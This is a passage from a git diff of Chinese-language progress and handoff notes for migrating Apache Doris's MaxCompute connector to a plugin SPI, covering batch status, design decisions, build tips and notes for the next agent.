isKey)。**作用域更正**:仅影响 `DESCRIBE`(`information_schema.columns.COLUMN_KEY` 受 `FrontendServiceImpl:962-965` OlapTable 门控、MC 前后皆空、已 parity);isKey 非纯展示(亦喂 `UnequalPredicateInfer`/BE descriptor)但 legacy 即喂 true→恢复既有值。〔原始计划:两列循环改 6 参 `ConnectorColumn(...,true)`;或接受+DV〕。**真值闸**:CI-skip live e2e `DESCRIBE ` 显 Key=YES(wiring 半,DV-017)。 +- [x] **丢 batch-mode 异步 split**(minor, F6/F13)✅ **DONE @`ac8f0fc15eb`**([D-035]/[DV-019];详见 `tasks/designs/P4-T06e-FIX-BATCH-MODE-SPLIT-design.md` + 设计验证 `wcpg9lblj` / impl-review `wve7y1jst` 各 GO-WITH-EDITS)。**用户定「实现 batch SPI 路径」(Shape A 薄 SPI + fe-core 编排、逐字镜像 legacy)**:① SPI `ConnectorScanPlanProvider` +2 additive default(`supportsBatchScan` false / `planScanForPartitionBatch` 委托 6 参 planScan)零破坏其余 6 连接器;② 连接器 `supportsBatchScan`=`odpsTable.getFileNum()>0`;③ fe-core `PluginDrivenScanNode`(已继承 batch dispatch+stop,`PluginDrivenSplit extends FileSplit` 故 `:381` 转型安全)override `isBatchMode`(4 闸+SF-1 null-guard)/`numApproximateSplits`/`startSplit`(getScheduleExecutor outer/inner CompletableFuture + SplitAssignment 契约,DEC-1 不下推 limit 传 -1) + 抽纯静态 `shouldUseBatchMode`。守门:编译/fe-core UT 9-9/fe-connector-api UT 2-2/checkstyle 0/import-gate/mutation 5-5 向红。**Batch-D 红线**:本 fix 落地才解锁删 legacy `MaxComputeScanNode` batch 逻辑副本(读裁剪那半 P1-4 已清,本项为最后前置闸;已在 `P4-batchD-maxcompute-removal-design.md` 加限定注)。**真值闸**:大分区 live e2e(EXPLAIN/profile 证 batched/streamed、耗时/内存≪同步路)=DV-019、CI 跳。**🎉 P3 全清。** + - **operational 坑(auto-memory 已记)**:mutation 跑中 `/mnt/disk1` 系统级满(非本 repo)致 cp 还原失败一度 truncate 产线文件→已从 `/dev/shm` 备份还原;教训=mutation 备份须放 RAM/异盘。 +- [x] **post-commit refresh 吞异常**(minor, regression=no, F15=F21)✅ **DONE @`1f2e00d3696`**([D-034]/[DV-018];详见 `tasks/designs/P4-T06e-FIX-POSTCOMMIT-REFRESH-design.md`)。**用户定 DV+Javadoc 泛化、不回退 legacy 传播失败**。**无产线逻辑改动**:仅 `PluginDrivenInsertExecutor.doAfterCommit` 的 Javadoc(`:164-176`)从「只讲 JDBC_WRITE」泛化到覆盖 connector-transaction(MC) 路径——两路径数据在 doAfterCommit 时均已持久、`super.doAfterCommit`(=`handleRefreshTable`) 只刷 FE 缓存 + 写 external-table refresh editlog(follower 失效提示、非数据真相源)、丢失只致 follower 缓存暂 stale 自愈。对抗性安全核查 inline 0 mustFix。守门 checkstyle 0、import-gate 净。**真值闸**:CI-skip live e2e(MC INSERT 提交后人为令 refresh 失败→断言报 OK+warn)。 + +## ⛓️ 横切 / 别忘 + +- [ ] **Batch-D 红线扩充**:删 legacy 前须先在 PluginDriven/connector 路径补齐 → `PhysicalMaxComputeTableSink`(写分发唯一副本)、`allowInsertOverwrite` 的 MC 分支、`bindMaxComputeTableSink` 静态分区过滤、**`MaxComputeScanNode` 读裁剪下推(P1-4 已补 plugin 侧)**。复查 Batch-D 设计对这些文件的"zero survivor"声明(连同既有 `PartitionsTableValuedFunction` 红线)。 +- [x] **F9 CAST 剥壳下推复查** ✅ **DONE @`cc32521ed99`**([D-036]/[DV-020];详见 `tasks/designs/P4-T06e-FIX-CAST-PUSHDOWN-design.md`)。**复查推翻 review 的「已登记降级」定级**:对抗核验 `wzoa6dkvw` **0/3 refuted**、verdict=**real-unregistered-regression**——MaxCompute 继承 `supportsCastPredicatePushdown=true`、剥壳谓词推 ODPS 源端 under-match(`CAST(str AS INT)=5`→`str="5"` 丢 `'05'/' 5'`)、BE 复算无法找回源端已丢行;legacy 丢弃 CAST 谓词(BE-only)故正确 ⇒ **回归**(非 DV-016 的 limit-opt 资格 CAST-unwrap)。**用户定 Fix**:① 连接器 `supportsCastPredicatePushdown→false`(激活既有 strip、恢复 legacy parity);② fe-core `getSplits` 剥壳时抑制 source LIMIT(impl-review `wj2h0120n` F9-LIMITOPT-1:否则空 filter 触发 limit-opt under-return)。守门 连接器 UT2-2+mut / fe-core LimitStrip2-2+BatchMode9-9+mut2-2 / checkstyle 0 / import-gate。真值闸 live ODPS=DV-020。**out-of-scope surface**:JDBC `applyLimit`+cast-off 理论同类(MC 不 override applyLimit、本修对 MC 完整),DV-020 备查。 +- [~] **doc-sync**:P0-1/P0-2/P0-3 + **P1-4 已落并 commit**(decisions-log D-027..D-031、deviations-log DV-013/DV-014/DV-015、cutover-design §4.2、FIX-WRITE-DISTRIBUTION-design index-by-cols superseded、**FIX-PART-GATES design/review-rounds「pruning 不变式 clean」⚠️ 更正 + D-028 ⚠️ 补注(DG-1✅)**、本 HANDOFF、task-list)。**剩余(随 P2+ 处理)**:DG-2 证伪 DECISION-3「忠实镜像」、DG-4/DG-6 task-list「6/6 完成」措辞,各 P2+ 项落地时同步 design/log。 + +--- + +## ⚙️ 操作须知(无结论,纯工程) +- **maven 必绝对 `-f` + `-pl :artifactId`**:改 fe-core 带 `:fe-core -am`;改连接器带 `:fe-connector-maxcompute`。读真实 `BUILD SUCCESS/FAILURE` 与尾部 `echo "MVN_EXIT=$?"`;**勿信**后台 task-notification 的 exit code。 +- **build cache 坑**:守门/跑测带 `-Dmaven.build.cache.enabled=false`,否则会 restore 旧 build 且 **surefire XML 可能 stale**(前序 session 多次踩到:mutation 跑出 BUILD FAILURE 但读到旧 XML 显示 0 fail)。直接读 mvn 输出的 `Tests run:` 行,别只读 XML。 +- **checkstyle**:`-pl :fe-core checkstyle:check`;`CustomImportOrder`(doris→第三方[com.*/org.* 非 doris]→java)/`UnusedImports`/`LineLength 120`;扫 test 源。 +- **import-gate**:`bash tools/check-connector-imports.sh`(repo 根跑)。 +- **分支**:`catalog-spi-05`,本地;未跟踪 `.audit-scratch/` `conf.cmy/` `regression-conf.groovy.bak`(勿提交)。 +- **mutation 验证技巧**:改产线一处→跑相关 UT→确认对应 test 变红→还原。用 `cp` 备份产线文件做 mutation(比 perl 删块安全——perl 易匹配到首个同名 `if` 误删方法)。 + +## 🧠 给下一个 agent 的 meta +- **live e2e(真实 ODPS)仍是翻闸真正完成门**——本复审是静态代码层面的高置信判定,**不替代 e2e**;写路径 blocker(动态/静态分区 / INSERT OVERWRITE)最终须 live 验。runbook 见 `git show` 历史 HANDOFF 或 decisions-log。 +- 复审脚本可复用:`plan-doc/reviews/maxcompute-full-rereview.workflow.js`(clean-room 编排,Phase A/B 只读码、Phase C 解禁先验;args 可调 `verifyVotes/lensesPerDomain/includeBe`)。clean-room 偏好见 auto-memory `clean-room-adversarial-review-pref`。 +- 先验/历史交叉核对账(P4-T06d designs/reviews、cutover-fix-design、decisions/deviations-log、task-list)即将随上述修复更新——改前先读对应条目(Rule 8)。 -- **P3 hybrid 收尾**:批 A–D 已全部 in-scope 完成。下一步是**分叉决策**(PR / 批 E→P7 / P4),**先问用户**,别默认开 PR 或自动进 P4。 -- **批 E 实现按 T08 设计走**(M1⊥M2,M2=方案 B),**别按 D-005 旧"PhysicalXxxScan"措辞**(已被 D-020 supersede)。新 default 方法保持 D-009(不破签名)。 -- 偏差先记 `deviations-log.md` 再改文档;架构/可行性 fork 先问用户(本场 M2 方案 B 已签字 → D-020)。 -- Maven:cwd=`fe/`;`-pl -am`;`-Dmaven.build.cache.enabled=false`;测试 `-DfailIfNoTests=false`;**checkstyle 单独跑**(含 test 源);**禁 static import**。 -``` +
diff --git a/plan-doc/PROGRESS.md b/plan-doc/PROGRESS.md index b6d5a08db8f9d8..203565b1a13265 100644 --- a/plan-doc/PROGRESS.md +++ b/plan-doc/PROGRESS.md @@ -1,6 +1,6 @@ # 📊 项目进度仪表盘 -> 最后更新:**2026-06-05** | 当前阶段:**P3 Hudi hybrid(D-019)批 A–D 全部 in-scope 完成**(T02/T04/T05/T07 ✅ + T06/T08 决策;T03→批 E);剩批 E(cutover)并入 P7,P3 PR #64143 已开(CI 中) | 项目总进度:**33%** +> 最后更新:**2026-06-09** | 当前阶段:**P4 maxcompute·scope=C(翻闸完成)**——写/事务 SPI RFC 已批准;**W-phase(W1–W7)全部落地** ✅;**P4 adopter 设计已批准**([D-023],5 批/11 task);**Batch A+B 全完成**(T01–T04,gate 关 dormant);**Batch C 翻闸完成**(T05 image-compat + T06a 写接线/UT + **T06b flip ✅** `CatalogFactory.SPI_READY_TYPES += "max_compute"`,gate 全绿 [D-027]);**Batch D 删除完成 ✅**(2026-06-09,分支 `catalog-spi-06` off upstream `9ed49571b20`/#64253:删 20 fe-core 文件 + 21 反向引用清理 + MCUtils 下沉 be-java-ext,fe-core 依赖树**彻底无 odps**;`7a4db351100`+`409300a75b8`,test-compile/checkstyle 0/import-gate/grep-empty/dependency:tree 全绿——设计 [Batch D 移除](./tasks/designs/P4-batchD-maxcompute-removal-design.md))。P3 hybrid 已 **#64143 合入** `branch-catalog-spi`(`5c240dc7a34`)| 项目总进度:**38%** > [README](./README.md) · [Master Plan](./00-connector-migration-master-plan.md) · [SPI RFC](./01-spi-extensions-rfc.md) · [Decisions](./decisions-log.md) · [Deviations](./deviations-log.md) · [Risks](./risks.md) · [Agent Playbook](./AGENT-PLAYBOOK.md) · [Handoff](./HANDOFF.md) --- @@ -12,8 +12,8 @@ | **P0** | SPI 缺口补齐 | 2 周 | ▰▰▰▰▰▰▰▰▰▰ 100% | ✅ 完成(PR #63582 squash-merge `c6f056fa5bd`,T24-T25 流水线全绿)| [tasks/P0](./tasks/P0-spi-foundation.md) | | **P1** | scan-node 收口 + 重复清理 | 1 周 | ▰▰▰▰▰▰▰▰▰▰ 100% | ✅ 完成(PR [#63641](https://github.com/apache/doris/pull/63641) squash-merged `778c5dd610f`;T1 推迟 P8;T2 推迟 P4/P5)| [tasks/P1](./tasks/P1-scan-node-cleanup.md) | | **P2** | trino-connector 迁移 | 2 周 | ▰▰▰▰▰▰▰▰▰▰ 100% | ✅ 已合入 `branch-catalog-spi`(#64096,squash `0793f032662`;T12 回归推迟 DV-003)| [tasks/P2](./tasks/P2-trino-connector-migration.md) | -| P3 | hudi 迁移 | 2 周 | ▰▰▰▰▰▱▱▱▱▱ 45% | 🚧 hybrid(D-019);**批 A–D 全部 in-scope 完成**(T02/T04/T05/T07 ✅ + T06/T08 决策;T03→批 E);剩批 E(cutover)并入 P7,P3 PR #64143 已开(CI 中) | [tasks/P3](./tasks/P3-hudi-migration.md) | -| P4 | maxcompute 迁移 | 2 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | +| P3 | hudi 迁移 | 2 周 | ▰▰▰▰▰▱▱▱▱▱ 45% | ✅ hybrid(D-019)批 A–D 已合入 `branch-catalog-spi`(**#64143** squash `5c240dc7a34`);批 E(live cutover)并入 P7 | [tasks/P3](./tasks/P3-hudi-migration.md) | +| P4 | maxcompute 迁移 | 2 周 | ▰▰▰▰▰▰▰▰▱▱ 80% | 🚧 **W-phase 全落地** ✅;**Batch A+B 完成**(T01–T04 dormant);**Batch C 翻闸完成**(T05 + T06a + **T06b flip ✅** [D-027]);**Batch D 删除完成 ✅**(legacy 删 + odps 依赖彻底移除,`7a4db351100`+`409300a75b8`,全门绿);剩 push/PR | [tasks/P4](./tasks/P4-maxcompute-migration.md) | | P5 | paimon 迁移 | 3 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | | P6 | iceberg 迁移 | 5 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | | P7 | hive (+HMS) 迁移 | 6 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | @@ -33,7 +33,7 @@ | **es** | ✅ | ✅ 100% | ✅ | ✅ | ✅ | **100%** | [详情](./connectors/es.md) | | trino-connector | ✅ | ✅ 100% | ✅ | ✅ | ✅ | **100%** | [详情](./connectors/trino-connector.md) | | hudi | 🟡(D-005 区分符 + D-020 模型 dispatch 已设计;实现批 E)| 🟨 55%(读路径 dormant + 批 C 测试基线)| ❌(gate 关)| ❌ | 0/0(寄生 hms)| **25%** | [详情](./connectors/hudi.md) | -| maxcompute | 🟡 | 🟨 60% | ❌ | ❌ | 0/12 | **25%** | [详情](./connectors/maxcompute.md) | +| maxcompute | 🟡 | ✅ 100%(翻闸 + legacy 删除完成)| ✅ **翻闸 T06b** | ✅(Batch D 已删)| ✅ 0/0(已清)| **95%** | [详情](./connectors/maxcompute.md) | | paimon | 🟡 | 🟨 50% | ❌ | ❌ | 0/10 | **20%** | [详情](./connectors/paimon.md) | | iceberg | 🟡 | 🟥 10% | ❌ | ❌ | 0/19 | **5%** | [详情](./connectors/iceberg.md) | | hive (+hms) | 🟡 | 🟥 20% | ❌ | ❌ | 0/31 | **10%** | [详情](./connectors/hive.md) | @@ -44,7 +44,19 @@ > 状态非 ✅ 的项,按阶段聚合。详细见各阶段 task 文件。 -### P3 — hudi 迁移(🚧 hybrid,批 A–D 全部 in-scope 完成:T02/T04/T05/T07 ✅ + T06/T08 决策;T03→批 E;剩批 E→P7,P3 PR #64143 已开(CI 中)) +### P4 — maxcompute 迁移(🚧 full adopter;**设计已批准** [D-023],5 批/11 task;Batch A+B+C ✅(翻闸完成),下一步 Batch D(删 legacy + drop odps 依赖,待 live 验证)) + +> 策略 = **full adopter + 翻闸**([D-023],非 P3 hybrid);前置 W-phase(W1–W7)✅。批次计划 + 完整 task 表见 [tasks/P4](./tasks/P4-maxcompute-migration.md)。 + +| 批 | 范围 | gate | task | 状态 | +|---|---|---|---|---| +| A | 连接器 DDL + 分区 parity | 🔒 关 | P4-T01 ✅ / T02 ✅ | ✅ T01 DDL + T02 分区 listing 完成(gate 全绿:compile + checkstyle 0 + import-gate)| +| B | 写/事务 SPI(`ConnectorTransaction`/`WriteOps` + `WritePlanProvider`→`TMaxComputeTableSink`)| 🔒 关 | P4-T03 ✅ / T04 ✅ | ✅ T03 写/事务 SPI(`MaxComputeConnectorTransaction`+`beginTransaction`)+ T04 写计划(`MaxComputeWritePlanProvider.planWrite`,OQ-2=Approach A)完成,gate 全绿 | +| C | 翻闸(`SPI_READY_TYPES` + GSON + `getEngine`;含 R-004 防御测)| 🔓 **live** | P4-T05/T06 | ✅ **翻闸完成**(T05 image-compat + T06a 写接线/UT + **T06b flip**,gate 全绿 [D-027]);R-004 part-2 live 待用户跑 | +| D | 清 ~30 反向引用 + 删 legacy 子系统(20 文件,收口 P1-T02)+ **drop fe-core odps 依赖** + **下沉 MCUtils/删 fe-common odps**(方案A §8)| 🔓 live | P4-T07/T08/T09 | ⏳ 方案已 finalize + @HEAD 校验(20 文件全在、linchpin residual=∅,2026-06-09);执行后 fe-core 依赖树**彻底无 odps**;**执行待用户 live ODPS 验证后**([D-027],[设计](./tasks/designs/P4-batchD-maxcompute-removal-design.md))| +| E | 连接器测试基线 + PR | — | P4-T10/T11 | ⏳ | + +### P3 — hudi 迁移(🚧 hybrid,批 A–D 全部 in-scope 完成:T02/T04/T05/T07 ✅ + T06/T08 决策;T03→批 E;剩批 E→P7,**P3 已合入 #64143 `5c240dc7a34`**;批 E live cutover 并入 P7) > 策略 = **hybrid**([D-019](./decisions-log.md)):现做 (b) 连接器硬化+测试(behind gate),推迟 (a) 模型落地+cutover 到 hive/HMS migration。详细批次见 [tasks/P3](./tasks/P3-hudi-migration.md);背景见 [DV-005](./deviations-log.md) / [HANDOFF](./HANDOFF.md) 关键认知 1+1b。 @@ -128,6 +140,17 @@ > 倒序,新内容置顶;超过 14 天的条目移除(git log 保留历史)。 +- **2026-06-06(实现 ⑧·P4-T05)** ✅ **P4 Batch C 启动 — P4-T05 翻闸接线完成**(dormant、gate-green、**待 commit**,用户定时机):GsonUtils 三 GSON 注册(catalog `:397` / **db `:452`** / table `:472`)atomic 迁 `registerCompatibleSubtype`→`PluginDriven*` + 删 3 unused `maxcompute.*` import;`PluginDrivenExternalTable.getEngine`/`getEngineTableTypeName` 加 `case "max_compute"`(返 `MAX_COMPUTE_EXTERNAL_TABLE.toEngineName()`=null / `.name()`,**核 legacy 行为等价**);`legacyLogTypeToCatalogType` 仅加注释(默认分支已出 `"max_compute"`,不加 case)。**关键校正**:ordered TODO 漏 **db `:452`**——4-agent 对抗复核揪出,漏迁则翻闸后 `MaxComputeExternalDatabase.buildTableInternal:44` cast `PluginDrivenExternalCatalog`→`MaxComputeExternalCatalog` 抛 `ClassCastException`(es/jdbc/trino 均 catalog+db+table 齐迁,legacy DB 类已删);用户签字折入 T05。**复核另 2 告警判非问题**:`getMetaCacheEngine`→"default" 假阳性(plugin 路径经连接器 `initSchema` 取 schema、走 "default" 桶同 es/jdbc/trino,`MaxComputeExternalMetaCache` 仅 legacy 表引用=Batch-D 死码);`getMysqlType`→"BASE TABLE" 同 ES 既定行为(`ES_EXTERNAL_TABLE` 亦不在 `toMysqlType` switch,迁后同样 null→"BASE TABLE" 已 ship);dormancy 告警=既载中间态 caveat(其"留 registerSubtype"修法错=撞 duplicate-label IAE)。UT `PluginDrivenExternalTableEngineTest` +2 max_compute 例(9/9)。守门全绿(fe-core compile BUILD SUCCESS + checkstyle 0 + import-gate 0 + UT 9-0-0,真实 EXIT 核验)。详见设计 §3.4 / [D-026 校正]。**下一 = T06a(写接线 W-a..d + 静态分区/overwrite 绑定 + R-004 隔离 UT,dormant)→ T06b(flip)**。⚠️ T05↔flip 中间态不可部署(compat 已注册但 factory 仍 legacy)。 +- **2026-06-06(设计 ⑤·Batch C)** ✅ **P4 Batch C 翻闸设计完成 + 用户签字 [D-026]**(design-only,零代码):用户选 "Design Batch C first"。4 路 Explore re-verify recon 锚点 + 主线核读 executor/txn 生命周期,出 [翻闸设计](./tasks/designs/P4-T05-T06-cutover-design.md)(verified file:line + 5 gap G1–G5 + 写生命周期顺序 + R-004 两分测 + ordered TODO)。**3 决策签字**:D-1 capability signal=新增 `ConnectorWriteOps.usesConnectorTransaction()` flag(MC=true,否决 writePlanProvider 代理/复用 ConnectorWriteType);D-2 两 commit、flip 末(`[P4-T06a]` 接线 dormant + `[P4-T06b]` flip);D-3 静态分区/overwrite 绑定入 cutover(避 INSERT OVERWRITE PARTITION 翻闸回归)。**2 SPI 新增**(default-preserving,零 jdbc/es/trino 影响):`ConnectorSession.setCurrentTransaction` + `ConnectorWriteOps.usesConnectorTransaction`(impl 时 E11 登记)。**recon 校正**:GsonUtils 真锚 :397/:472(非 ~405/~478);`legacyLogTypeToCatalogType` 默认分支已出 "max_compute"(无需加 case);live executor=`PluginDrivenInsertExecutor`(现走 JDBC insert-handle 模型,对 MC `getWriteConfig`/`beginInsert`/`finishInsert` 全 throwing-default=直跑必抛);`PluginDrivenTransactionManager.begin(connectorTx):71-77` 未 putTxnById(G3);`UnboundConnectorTableSink` 不携静态分区(G4)。**下一 = 实现 T05(dormant)→ T06(live, 两 commit)**。 +- **2026-06-06(实现 ⑦·P4-T04)** ✅ **P4 Batch B 收尾 — P4-T04 连接器写计划完成 = Batch A+B 全完成**(gate 关、dormant、零 live 风险):新建 `MaxComputeWritePlanProvider implements ConnectorWritePlanProvider`,`planWrite` 走 **OQ-2 = Approach A**(finalizeSink 一处:建 ODPS Storage API 写 session → `session.getCurrentTransaction()`→`MaxComputeConnectorTransaction.setWriteSession` 绑事务 → 盖 `TMaxComputeTableSink` 静态字段 + `static_partition_spec` + `partition_columns`(ODPS 表列) + `write_session_id` + `txn_id`;**无运行期注入 hook**,legacy `MCInsertExecutor.beforeExec` 注入消失)。**5 决策 [D-025]**(D-1/D-2a 签字、D-3/D-4/D-5 主线定):D-3 抽 `MaxComputeDorisConnector.getSettings()`(决定性证据=legacy catalog 单 `settings` 同供 scan+write,抽出=忠实港非投机重构;scan provider :146-162 上移共用);D-4 `supportsInsert()`=true 余 throwing-default(实际 executor 面待 Batch C);fe-core seam(D-2a)`PluginDrivenTableSink.bindViaWritePlanProvider(insertCtx)` 读 overwrite+静态分区,`staticPartitionSpec` 加 `PluginDrivenInsertCommandContext`(非基类,避 `MCInsertCommandContext` shadow)。**坑10 javap 全核**(`withMaxFieldSize(long)`/`.partition`/`.overwrite`/`.withDynamicPartitionOptions`/`buildBatchWriteSession`throws IOException/`DynamicPartitionOptions.createDefault`/`PartitionSpec(String)`/`getId`);写路径 ArrowOptions = **MILLI/MILLI**(≠scan MILLI/MICRO)。**偏差 [DV-012]**:`partition_columns` 取 ODPS 表列(源不同值同)。binding 期填充 staticPartitionSpec/overwrite 仍 dormant 归 Batch C/D(坑3,`InsertIntoTableCommand:598` 现传空 ctx)。守门全绿(`-pl :fe-connector-maxcompute,:fe-core -am` compile BUILD SUCCESS/MVN_EXIT=0 + checkstyle 0 + import-gate 0,真实 EXIT 核验)。单测延 **P4-T10**。**T04 不新增 SPI 面**。**下一步 = Batch C 翻闸**(唯一 live 切点,A+B 全绿 ✅ + 前置 R-004 防御测)。 +- **2026-06-06(实现 ⑥·P4-T03)** ✅ **P4 Batch B 启动 — P4-T03 连接器写/事务 SPI 完成**(gate 关、dormant、零 live 风险):新建 `MaxComputeConnectorTransaction implements ConnectorTransaction`(港 legacy `MCTransaction` 写生命周期:`addCommitData` `TDeserializer(TBinaryProtocol)`→`TMCCommitData` 累积【commit 协议红线】、block 分配 CAS+上限校验、`commit` 港 `finishInsert`、rollback/close/getUpdateCnt)+ `MaxComputeConnectorMetadata.beginTransaction`,over W4 委派。**两 fork 用户签字 [D-024]**:(1) txn id 经新增 SPI `ConnectorSession.allocateTransactionId()`(fe-core `ConnectorSessionImpl` override `Env.getNextId`)分配——尊重 [D-015],补 id-less 连接器机制(E11 登记);(2) ODPS 写 session 创建挪 T04 planWrite(T03 纯事务容器,槽由 T04 经 `setWriteSession` 填)。**偏差 [DV-011]**:block 上限 fe-core `Config`(20000)→连接器常量、`UserException`→`DorisConnectorException`(import-gate 禁 `common.*`)。**JDBC 仅半样板**(无 `ConnectorTransaction`),MC 首个有状态事务 adopter。守门全绿(fe-connector-maxcompute+api+fe-core compile BUILD SUCCESS/MVN_EXIT=0 + checkstyle 0 + import-gate 0,真实 EXIT 核验)。单测延 **P4-T10**(write-txn golden、TBinaryProtocol round-trip)。**下一步 = P4-T04 写计划**(planWrite 产 `TMaxComputeTableSink` + OQ-2 write-context + 建 ODPS 写 session 绑事务)。 +- **2026-06-06(实现 ⑤·P4-T02)** ✅ **P4 Batch A 收尾 — P4-T02 连接器分区 listing 完成**(gate 关、dormant、零 live 风险):`MaxComputeConnectorMetadata` impl SPI `listPartitionNames`/`listPartitions`/`listPartitionValues`,三方法均直取 `structureHelper.getPartitions(odps, db, tbl)`:names = `PartitionSpec.toString(false,true)`(镜像 legacy `MaxComputeExternalCatalog:283`/`MaxComputeExternalTable:201`);`listPartitions` filter **忽略**返全量(values 由 `PartitionSpec.keys()`/`get(k)` 抽、props=emptyMap,镜像 SHOW PARTITIONS 不裁剪);`listPartitionValues` 按入参 `partitionColumns` 列序取 `spec.get(col)`。**OQ-4 定**:不建连接器自有 cache,直取 ODPS(Rule 2 不投机)。**保真说明**:legacy 双路径分歧(catalog:266 无 emptiness guard / table:200 有 `!partitionColumns.isEmpty()` guard),SPI 锚 catalog SHOW PARTITIONS 路径故**不加** guard;写前 javap 核 ODPS `PartitionSpec` 真实 API(`Set keys()`/`String get(String)`/`toString(boolean,boolean)`)。**测试**:按计划延至 **P4-T10** 连接器测试基线(无 mockito 手写替身),T02 gate = compile + checkstyle + import(R12 不静默)。守门全绿(连接器 compile BUILD SUCCESS/MVN_EXIT=0 + checkstyle 0/CS_EXIT=0 + import-gate 0,真实 EXIT 核验)。**下一步 = Batch B(P4-T03 写/事务 SPI)**。 +- **2026-06-06(实现 ④·P4-T01)** ✅ **P4 Batch A 启动 — P4-T01 连接器 DDL 完成**(gate 关、dormant、零 live 风险):`MaxComputeConnectorMetadata` impl SPI `createTable(ConnectorCreateTableRequest)` / `dropTable` / `createDatabase` / `dropDatabase`(忠实港 legacy `MaxComputeMetadataOps` 的 create/drop/validate/schema-build/lifecycle/bucket,**消费 P0 request 非 fe-core `CreateTableInfo`**)+ 新 `MCTypeMapping.toMcType(ConnectorType)` 反向类型映射(按 `PrimitiveType.toString()` switch,递归 ARRAY/MAP/STRUCT,不支持类型抛异常);连接器 `McStructureHelper` 已含全部 ODPS DDL 原语,无需新建。**附带修 fe-core 共享转换器 `ConnectorColumnConverter.toConnectorType` 丢 CHAR/VARCHAR 长度 [DV-010]**(用户 AskUserQuestion 签字;逆一致性 bug,影响 live jdbc/es CREATE TABLE,更正确)+ 回归测 `testCharVarcharLengthPreserved`。守门全绿(连接器 compile + checkstyle 0 + import-gate + fe-core `ConnectorColumnConverterTest` **9/0F0E**,真实 EXIT 核验)。**坑**:守门 maven `-pl` 须用 `:fe-connector-maxcompute`(冒号=artifactId);裸名被当相对路径 → reactor-not-found。下一步 = **P4-T02** 分区 listing。 +- **2026-06-06(设计 ④)** ✅ **P4 maxcompute adopter 设计批准**([D-023]):读 HANDOFF/PROGRESS/playbook + recon + 写-RFC §12,code-grounded re-grep(反向引用 post-W-phase **~19**,证 W-phase 灭 `Coordinator`/`LoadProcessor`/`FrontendServiceImpl` 3 热点 txn 站;`MCTransaction` 已含 W2 `addCommitData(byte[])`;`TMaxComputeTableSink` 18 字段齐)。产 [tasks/P4](./tasks/P4-maxcompute-migration.md):**5 批/11 task**(A 读/DDL parity → B 写/事务 → **C 翻闸(唯一 live 切点,含 R-004 防御测)** → D 清 ~19 引用+删 legacy → E 测+PR),用户批准。同步跟踪文档 + 修 §三 stale「P3 CI中」→ 已合 `5c240dc7a34`。**下一步 = Batch A**(P4-T01 DDL + P4-T02 分区,gate 关)。未动代码。 +- **2026-06-06(实现 ③)** ✅ **W-phase W4+W5+W7 落地(plugin-driven 写接线收口 + 文档)= W-phase(W1–W7)全完成**:**W4**(commit `759cc0874c8`)`PluginDrivenTransaction`(`PluginDrivenTransactionManager` 内类)override 4 个 fe-core `Transaction` 写 default 委派 wrap 的 SPI `ConnectorTransaction`(`addCommitData`/`supportsWriteBlockAllocation`/`allocateWriteBlockRange`/`getUpdateCnt`),legacy null marker 保持 inert(`allocateWriteBlockRange` 保 `throws UserException` 对齐接口,SPI 调用 unchecked);TDD RED 3F1E→GREEN 5/5。**W5**(commit `9ebe5e27fa4`)把 W1 写-plan SPI **layer 进既有** plugin-driven 写路径:`PhysicalPlanTranslator.visitPhysicalConnectorTableSink` + `PluginDrivenTableSink.bindDataSink` 在 `connector.getWritePlanProvider()!=null` 时走 `planWrite()` 产 opaque `TDataSink`,config-bag(jdbc)为 fallback。**关键修正 [DV-009]**:RFC/handoff W5 措辞(route 3 个 `visitPhysicalXxxTableSink` + 新建 sink)与代码不符——`PluginDrivenTableSink` 已存在、plugin-driven 写走 `visitPhysicalConnectorTableSink` 专路;那 3 个 concrete 方法服务 legacy 表,加路由是死代码。用户 AskUserQuestion 签字「Corrected W5 (layer planWrite)」;TDD RED(缺 ctor 编译失败)→GREEN 1/1。**W7** 文档:补 **[D-021]**(scope=C)+**[D-022]**(写 SPI A/B1/C1/D/E) 入 decisions-log(两 session 前签字未 log,traceability 缺口补齐);deviations-log 加 [DV-009] + 修 stale 索引(共 7→9、补 DV-008 行);01-spi-rfc 加 §20 E11 节(脚注 D-022)+ §3 矩阵 E11 行;同步本 PROGRESS / connectors/maxcompute / HANDOFF。三 commit 独立、behind gate、gate 全绿(compile + 定向测 + checkstyle 0 + import-gate,真实 exit code 核验)。**下一步 = P4 maxcompute adopter**(搬 `datasource/maxcompute/` → fe-connector-maxcompute、impl 写 SPI、翻闸 `max_compute`)。 +- **2026-06-06(实现 ②)** ✅ **W-phase W3+W6 落地**(解耦热路径 cast/instanceof + golden 测,behind gate、零行为变更、golden by TDD):**W3** 新 helper `CommitDataSerializer.feed(Transaction, List>)`(序列化协议单点 `TBinaryProtocol`,对齐 W2 反序列化;fail-loud `TException→RuntimeException`);`Coordinator`/`LoadProcessor` 3 个 concrete cast(HMS/Iceberg/MC)→ 1 个 **guarded 块** `if (hive||iceberg||mc){ Transaction txn=…getTxnById(txnId); feed each set 字段 }`;`FrontendServiceImpl` `instanceof MCTransaction`→`!supportsWriteBlockAllocation()`、`allocateBlockIdRange`→`allocateWriteBlockRange`;三文件 concrete import/usage 全删(grep 空)。**🔴 关键修正**:`getTxnById` 未知 id **抛 `RuntimeException` 非返 null**(`GlobalExternalTransactionInfoMgr:30`),legacy 仅在 `if(isSetXxx)` 内调;故 getTxnById 必 guard 在 "任一 commit 字段 set" 内(上 handoff 字面无守卫会击穿所有常规 load)。**W6** TDD:先写测→**故意错协议 `TCompactProtocol`**→RED(`TProtocolException: Unrecognized type 24`,证测守协议红线 + 走真实 `feed→addCommitData`)→翻 `TBinaryProtocol`→GREEN。4 golden(round-trip 钉协议无损 + iceberg/hms 比 list getter + mc 比 getUpdateCnt;MC 无 list getter 故不加测专用 getter/反射)+ 4 SPI default(`ConnectorTransactionDefaultsTest`) + 既有 `FrontendServiceImplTest#testGetMaxComputeBlockIdRange`。守门全绿(真实 exit 核验):compile BUILD SUCCESS + 9 测 0F0E + checkstyle 0 + import-gate。**W1+W2 已提交** `be945476ba7`(上 handoff "未提交" 过时);**W3+W6 未提交**(应独立 commit)。下一步 W4/W5(plugin-driven 写接线)+ W7(D-021/D-022 入 log)。 +- **2026-06-06(实现)** ✅ **W-phase W1+W2 落地**(写/事务 SPI 面 + fe-core `Transaction` 泛化,behind gate、零行为变更):**W1**(`fe-connector-api`)`ConnectorTransaction`(SPI) +4 